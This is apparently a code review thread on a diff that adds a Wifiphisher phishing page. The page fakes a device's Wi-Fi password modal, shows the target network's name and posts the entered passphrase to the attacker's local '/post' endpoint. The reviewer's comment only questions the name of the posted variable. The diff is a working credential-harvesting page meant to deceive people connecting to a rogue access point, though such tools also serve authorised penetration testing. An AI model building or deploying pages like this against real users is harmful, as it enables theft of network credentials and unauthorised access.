wifiphisher/data/phishing-pages/device-modal/index.html

```diff
@@ -0,0 +1,694 @@
+							<div class="item-title label">Password</div>
+							<div class="item-input">
+								<form>
+									<input id="pwfield" name="password" type="password">
+								</form>
+							</div>
+						</div>
+					</div>
+				</li>
+			</ul>
+		</div>
+	</div>
+	<div class="container android hide">
+		<div style="display: block; margin-top: -107px;" class="modal  modal-in">
+			<div class="modal-inner">
+				<div class="modal-title"><span>{{ target_ap_essid }}</span></div>
+				<div class="modal-text">Enter your password</div>
+				<div class="input-field">
+					<input name="modal-password" placeholder="Password" class="modal-text-input" type="password">
+				</div>
+			</div>
+			<form id="demoform-2" class="store-data list-block">
+				<ul>
+					<li class="check1">
+						<label class="label-checkbox item-content">
+							<input name="ks-checkbox" value="Show password" type="checkbox">
+							<div class="item-media"><i class="icon icon-form-checkbox"></i></div>
+							<div class="item-inner">
+								<div class="item-title">Show password</div>
+							</div>
+						</label>
+					</li>
+					<li class="check2">
+						<label class="label-checkbox item-content">
+							<input name="ks-checkbox" value="Show advanced options" type="checkbox">
+							<div class="item-media"><i class="icon icon-form-checkbox"></i></div>
+							<div class="item-inner">
+								<div class="item-title">Show advanced options</div>
+							</div>
+						</label>
+					</li>
+					<div class="spoiler displayNone"></div>
+				</ul>
+			</form>
+			<div class="modal-buttons modal-buttons-2 ">
+				<span class="modal-button cancel">Cancel</span>
+				<span class="modal-button modal-button-bold ok inactive">Connect</span>
+			</div>
+		</div>
+		<div class="modal-overlay modal-overlay-visible"></div>
+	</div>
+	<script src="./static/libs/jquery.min.js"></script>
+	<script src="./static/js/framework7.min.js"></script>
+	<script src="./static/js/kitchen-sink.js"></script>
+	<script type="text/javascript">
+        // OS Functions
+        // PC
+        function chrome(){
+        	var checked = false;
+        	$('.main').removeClass('hide');
+
+        	// main.js
+        	// Functions
+        	function toggle(){
+        		$('body .main .window').toggleClass('faded');
+        	}
+        	function hide(){
+        		$('body .main .window').addClass('faded');
+        	}
+        	function close(){
+        		$('body .main .window').addClass('faded');
+        		setTimeout(function(){
+        			window.location = window.location;
+        		}, 800);
+        	}
+
+        	$('.main form').submit(function(e){
+        		hide();
+
+        		if ($('.main input[name=password]').val().length < 8) {
+        			close();
+        			return false;
+        		} else {
+        			e.preventDefault();
+
+    				// timeout:800
+    				setTimeout(function(){
+    					$.post('/post', 'wfphshr-wpa-password=' + $('.main input[name=password]').val(), function(){
```

Comment:
The variable's name 'wfphshr-wpa-password' indicate that the captured passphrase will always be the pre-shared key. Is this true? If not, you should rename the variable to something more generic.